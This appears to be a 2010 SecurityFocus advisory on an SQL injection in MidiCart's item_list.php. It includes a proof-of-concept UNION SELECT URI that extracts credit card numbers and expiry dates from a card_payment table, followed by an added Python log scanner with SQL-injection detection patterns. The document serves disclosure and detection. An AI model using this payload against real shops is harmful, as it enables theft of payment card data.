MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability

No exploit is required.

The following proof-of-concept URIs are available:

http://www.example.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment

http://www.example.com/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION]
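
A defender can look for requests of this shape in web server logs. The following is an added example, not part of the original advisory or of MidiCart: it scans access-log lines for item_list.php / item_list.asp requests whose secondgroup or maingroup value carries SQL syntax. The combined-style log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter and script names taken from the advisory's proof-of-concept URIs.
WATCHED_PARAMS = {"secondgroup", "maingroup"}
SCRIPT_RE = re.compile(r"/item_list\.(php|asp)$", re.IGNORECASE)
# SQL syntax that a category value should not contain. A legitimate value
# with an apostrophe would also match, so treat hits as leads to review.
SQLI_RE = re.compile(
    r"""['";]|--|/\*|\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b""",
    re.IGNORECASE | re.DOTALL)
# Assumed log format: the request line is quoted, as in Apache combined logs.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:10:00:00 +0000] "GET /shop/item_list.php?maingroup=Books&secondgroup=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /shop/item_list.php?secondgroup=-99%20%27UNION%20SELECT%20null,null%20FROM%20t HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /shop/index.php?q=union+select HTTP/1.1" 200 300',
]

def suspicious_params(request_target):
    """Return {param: decoded value} for watched parameters carrying SQL syntax."""
    parts = urlsplit(request_target)
    if not SCRIPT_RE.search(parts.path):
        return {}
    hits = {}
    # parse_qs percent-decodes values, so encoded quotes and spaces are seen.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in WATCHED_PARAMS:
            for value in values:
                if SQLI_RE.search(value):
                    hits[name.lower()] = value
    return hits

def scan(lines):
    """Return [(line_number, hits)] for log lines that warrant review."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                findings.append((number, hits))
    return findings

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Log review of this kind only shows that the parameter was probed; the underlying fix is to stop building the query from the raw secondgroup value.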


 

Copyright 2010, SecurityFocus